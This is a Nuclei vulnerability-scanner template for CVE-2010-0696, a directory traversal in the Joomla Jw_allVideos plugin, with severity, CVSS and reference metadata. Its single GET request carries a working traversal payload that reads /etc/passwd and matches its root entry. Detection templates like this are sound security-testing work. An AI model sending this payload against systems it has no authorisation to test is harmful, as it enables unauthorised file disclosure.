nuclei-templates/http/cves/2010/CVE-2010-0696.yaml

44 lines
1.5 KiB
YAML

id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: medium
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/11447
- https://nvd.nist.gov/vuln/detail/CVE-2010-0696
- http://www.joomlaworks.gr/content/view/77/34/
- http://www.exploit-db.com/exploits/11447
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0696
cwe-id: CWE-22
epss-score: 0.62698
epss-percentile: 0.97457
cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomlaworks
product: jw_allvideos
tags: cve,cve2010,joomla,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a004830460221008c2805575698de9ea00247d201f54ba28c73662473abdc4173cb718e62386a2d022100d0b7226f7e060cb00b514893764d7abbe7bdd205d0a18f7f9208a50913a67d65:922c64590222798bb761d5b6d8e72950